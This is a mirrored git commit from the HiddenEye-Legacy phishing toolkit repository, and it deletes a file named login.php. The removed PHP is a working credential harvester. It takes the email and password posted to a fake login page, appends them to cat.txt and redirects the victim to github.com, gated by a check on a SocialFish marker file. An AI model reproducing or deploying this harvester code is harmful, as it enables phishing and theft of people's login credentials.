mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Delete login.php
This commit is contained in:
parent
d80fb69230
commit
0191144cbd
|
@ -1,15 +0,0 @@
|
|||
<?php
|
||||
$var = $_POST['email'];
|
||||
$var2 = $_POST['pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
|
||||
if($myFile == $searchString) {
|
||||
file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://github.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
|
||||
}
|
||||
exit();
|
||||
?>
|
||||
|
Loading…
Reference in New Issue
Block a user